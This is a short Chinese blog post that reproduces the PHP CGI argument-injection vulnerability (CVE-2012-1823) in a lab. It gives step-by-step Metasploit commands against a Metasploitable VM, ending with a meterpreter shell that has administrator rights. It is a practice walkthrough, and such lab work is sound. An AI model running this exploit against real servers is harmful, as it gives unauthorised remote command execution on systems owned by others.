发布于2022年10月15日3年前 PHP CGI漏洞利用 今日复现一个早期的漏洞,PHP CGI漏洞,代号为cve:2012-1823,该漏洞暂时只能攻击linux系统,属于linux漏洞 使用工具:攻击机kali linux、靶机metasploitable linux 具体步骤如下: 1.登入msfconsloe 2.搜索漏洞代号,输入 search cve:2012-1823 3.复制粘贴exploit/multi/http/php_cgi_arg_injection 或者use 0 详细如下: msf > use exploit/multi/http/php_cgi_arg_injection 或者 msf > use 0 4.进行相关设置 msf6 exploit(multi/http/php_cgi_arg_injection) > set rhosts 192.168.30.141 rhosts => 192.168.30.141 msf6 exploit(multi/http/php_cgi_arg_injection) > msf6 exploit(multi/http/php_cgi_arg_injection) > show options 5.开始攻击 msf6 exploit(multi/http/php_cgi_arg_injection) > exploit 6.攻击成功,输入shell,可进入被攻击方的命令提示符,权限为系统管理员权限 meterpreter > shell
创建帐户或登录后发表意见